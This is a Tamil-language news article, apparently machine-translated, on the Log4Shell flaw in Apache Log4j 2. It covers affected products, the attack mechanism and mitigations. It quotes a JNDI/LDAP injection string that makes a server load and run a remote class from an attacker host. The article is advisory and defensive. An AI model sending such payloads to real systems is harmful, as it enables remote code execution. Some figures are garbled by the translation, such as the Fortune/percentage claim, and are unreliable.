Log4Shell, Apache Log4j 2 இல் உள்ள ஒரு முக்கியமான பாதிப்பு இது பல ஜாவா திட்டங்களை பாதிக்கிறது

சமீபத்தில் எஸ்e Apache Log4j 2 இல் ஒரு முக்கியமான பாதிப்பு கண்டறியப்பட்டது என்ற செய்தியை வெளியிட்டது, இது ஜாவா பயன்பாடுகளில் பதிவேட்டை ஒழுங்கமைப்பதற்கான ஒரு பிரபலமான கட்டமைப்பாக வகைப்படுத்தப்படுகிறது, "{jndi: URL}" வடிவத்தில் சிறப்பாக வடிவமைக்கப்பட்ட மதிப்பு பதிவேட்டில் எழுதப்படும் போது தன்னிச்சையான குறியீட்டை செயல்படுத்த அனுமதிக்கிறது.

பாதிப்பு ஜாவா பயன்பாடுகளில் தாக்குதல் நடத்தப்படலாம் என்பதால் இது குறிப்பிடத்தக்கதுஅவை வெளிப்புற மூலங்களிலிருந்து பெறப்பட்ட மதிப்புகளைப் பதிவு செய்கின்றன, எடுத்துக்காட்டாக பிழை செய்திகளில் சிக்கல் மதிப்புகளைக் காண்பிப்பதன் மூலம்.

என்று கவனிக்கப்படுகிறது Apache Struts, Apache Solr, Apache Druid அல்லது Apache Flink போன்ற கட்டமைப்புகளைப் பயன்படுத்தும் கிட்டத்தட்ட அனைத்து திட்டங்களும் பாதிக்கப்பட்டுள்ளன, Steam, Apple iCloud, Minecraft கிளையண்டுகள் மற்றும் சர்வர்கள் உட்பட.

ஃபார்ச்சூன் 65 இணையப் பயன்பாடுகளில் 100% பயன்படுத்தப்படும் தோராயமான மதிப்பீடாக இருக்கும் Apache Struts என்ற கட்டமைப்பில் உள்ள முக்கியமான பாதிப்புகளின் வரலாற்றை மீண்டும் மீண்டும் செய்யும் வகையில், நிறுவன பயன்பாடுகள் மீதான பாரிய தாக்குதல்களின் அலைக்கு இந்த பாதிப்பு வழிவகுக்கும் என எதிர்பார்க்கப்படுகிறது. பாதிக்கப்படக்கூடிய அமைப்புகளுக்கு நெட்வொர்க்கை ஸ்கேன் செய்ய ஏற்கனவே பதிவுசெய்யப்பட்ட முயற்சிகள் அடங்கும்.

பாதிப்பானது அங்கீகரிக்கப்படாத குறியீட்டை தொலைநிலையில் செயல்படுத்த அனுமதிக்கிறது. Log4j 2 என்பது அப்பாச்சி அறக்கட்டளையால் உருவாக்கப்பட்ட ஒரு திறந்த மூல ஜாவா பதிவு நூலகம் ஆகும். Log4j 2 பல பயன்பாடுகளில் பரவலாகப் பயன்படுத்தப்படுகிறது மற்றும் பல சேவைகளில் சார்புநிலையாக உள்ளது. வணிக பயன்பாடுகள் மற்றும் பல கிளவுட் சேவைகள் இதில் அடங்கும்.

Randori தாக்குதல் குழு ஒரு செயல்பாட்டு சுரண்டலை உருவாக்கியுள்ளது மற்றும் எங்கள் தாக்குதல் பாதுகாப்பு தளத்தின் ஒரு பகுதியாக வாடிக்கையாளர் சூழலில் இந்த பாதிப்பை வெற்றிகரமாக பயன்படுத்த முடிந்தது. 

பல பயன்பாடு சார்ந்த முறைகள் மூலம் பாதிப்பை அணுகலாம். உண்மையில், Log4j நூலகத்தைப் பயன்படுத்தும் ஒரு பயன்பாடு கோப்புகளைப் பதிவுசெய்ய எழுதும் தன்னிச்சையான தரவை வழங்க தொலைநிலை இணைப்பை அனுமதிக்கும் எந்தவொரு சூழ்நிலையும் சுரண்டலுக்கு ஆளாகிறது. இந்த பாதிப்பு காடுகளில் சுரண்டப்படுவதற்கான வாய்ப்புகள் அதிகம் மற்றும் ஆயிரக்கணக்கான நிறுவனங்களை பாதிக்கும். இந்த பாதிப்பு பாதிக்கப்பட்ட அமைப்புகளுக்கு குறிப்பிடத்தக்க உண்மையான ஆபத்தை பிரதிபலிக்கிறது.

ஒரு செயல்பாட்டுச் சுரண்டல் ஏற்கனவே வெளியிடப்பட்டிருப்பதால் சிக்கல் சிக்கலானது, எ.கா.ஆனால் நிலையான கிளைகளுக்கான திருத்தங்கள் இன்னும் உருவாக்கப்படவில்லை. CVE அடையாளங்காட்டி இன்னும் ஒதுக்கப்படவில்லை. தீர்வு log4j-2.15.0-rc1 சோதனைக் கிளையில் மட்டுமே சேர்க்கப்பட்டுள்ளது. பாதிப்பைத் தடுப்பதற்கான ஒரு தீர்வாக, Log4j2.formatMsgNoLookups அளவுருவை true என அமைக்க பரிந்துரைக்கப்படுகிறது.

பிரச்சனை பதிவு வரிகளில் சிறப்பு முகமூடிகளை «{}» கையாளுவதை Log4j 2 ஆதரிக்கிறது என்பதே இதற்குக் காரணம்., இதில் JNDI வினவல்களை இயக்கலாம் (ஜாவா பெயரிடுதல் மற்றும் அடைவு இடைமுகம்).

CVE-2021-44228 ஐ பகுப்பாய்வு செய்வதில், Randori பின்வருவனவற்றை தீர்மானித்துள்ளார்:

பரவலாகப் பயன்படுத்தப்படும் வணிக மென்பொருளின் இயல்புநிலை நிறுவல்கள் பாதிக்கப்படக்கூடியவை.
பாதிப்பை நம்பகத்தன்மையுடன் மற்றும் அங்கீகாரம் இல்லாமல் பயன்படுத்திக் கொள்ளலாம்.
பாதிப்பு Log4j 2 இன் பல பதிப்புகளைப் பாதிக்கிறது.
பயனர் நூலகத்தைப் பயன்படுத்தி பயன்பாட்டை இயக்கும்போது பாதிப்பு தொலைநிலைக் குறியீட்டை செயல்படுத்த அனுமதிக்கிறது.

தாக்குதலானது "$ {jndi: ldap: //example.com/a}" என்ற பதிலுடன் ஒரு சரத்தை அனுப்புகிறது, அதைச் செயலாக்குவதன் மூலம் Log4j 2 ஜாவா வகுப்பிற்கான பாதைக்கான LDAP கோரிக்கையை attacker.com சேவையகத்திற்கு அனுப்பும். . தாக்குபவரின் சேவையகத்தால் திருப்பியளிக்கப்பட்ட பாதை (உதாரணமாக, http://example.com/Exploit.class) தற்போதைய செயல்முறையின் பின்னணியில் ஏற்றப்பட்டு செயல்படுத்தப்படும், இது உரிமைகளுடன் கணினியில் தன்னிச்சையான குறியீட்டை செயல்படுத்துவதற்கு தாக்குபவர் அனுமதிக்கிறது. தற்போதைய பயன்பாட்டின்.

இறுதியாக, அது குறிப்பிடப்பட்டுள்ளது அசாதாரணங்கள் கண்டறியப்பட்டால், இது ஒரு செயலில் உள்ள சம்பவம் என்றும், சமரசம் செய்யப்பட்டுள்ளது என்றும், அதற்கேற்ப பதிலளிக்கவும் பரிந்துரைக்கப்படுகிறது. Log4j 2 இன் பேட்ச் செய்யப்பட்ட பதிப்புகள் அல்லது பாதிக்கப்பட்ட பயன்பாடுகளுக்கு மேம்படுத்துவது இந்த பாதிப்பை நீக்கும். ராண்டோரி எந்த நிறுவனமும் பாதிக்கப்படலாம் என்று நம்பும் நிறுவனத்தை அவசரமாக பேட்ச் செய்யப்பட்ட பதிப்பிற்கு மேம்படுத்த பரிந்துரைக்கிறார்.

Apache Log4j குழுவின் சமீபத்திய புதுப்பிப்பில், நிறுவனங்கள் பின்வருவனவற்றைச் செய்ய பரிந்துரைக்கின்றன

  • Log4j 2.15.0 க்கு புதுப்பிக்கவும்
  • 2.15.0 க்கு மேம்படுத்த முடியாதவர்கள்: பதிப்புகள்> = 2.10 இல், இந்த பாதிப்பை log4j2.formatMsgNoLookup அமைப்பு சொத்து அல்லது LOG4J_FORMAT_MSG_NO_LOOKUPS சூழல் மாறி சரி என அமைப்பதன் மூலம் குறைக்கலாம்.
  • 2,0-beta9 முதல் 2.10.0 வரையிலான பதிப்புகளுக்கு, JndiLookup வகுப்பை வகுப்புப் பாதையில் இருந்து அகற்றுவது: zip -q -d log4j-core - *. Jar org / apache / logging / log4j / core / lookup /JndiLookup.class.

மூல: https://www.lunasec.io/


உங்கள் கருத்தை தெரிவிக்கவும்

உங்கள் மின்னஞ்சல் முகவரி வெளியிடப்பட்ட முடியாது. தேவையான புலங்கள் குறிக்கப்பட்டிருக்கும் *

*

*

  1. தரவுக்கு பொறுப்பு: மிகுவல் ஏஞ்சல் கேடன்
  2. தரவின் நோக்கம்: கட்டுப்பாட்டு ஸ்பேம், கருத்து மேலாண்மை.
  3. சட்டபூர்வமாக்கல்: உங்கள் ஒப்புதல்
  4. தரவின் தொடர்பு: சட்டபூர்வமான கடமையால் தவிர மூன்றாம் தரப்பினருக்கு தரவு தெரிவிக்கப்படாது.
  5. தரவு சேமிப்பு: ஆக்சென்டஸ் நெட்வொர்க்குகள் (EU) வழங்கிய தரவுத்தளம்
  6. உரிமைகள்: எந்த நேரத்திலும் உங்கள் தகவல்களை நீங்கள் கட்டுப்படுத்தலாம், மீட்டெடுக்கலாம் மற்றும் நீக்கலாம்.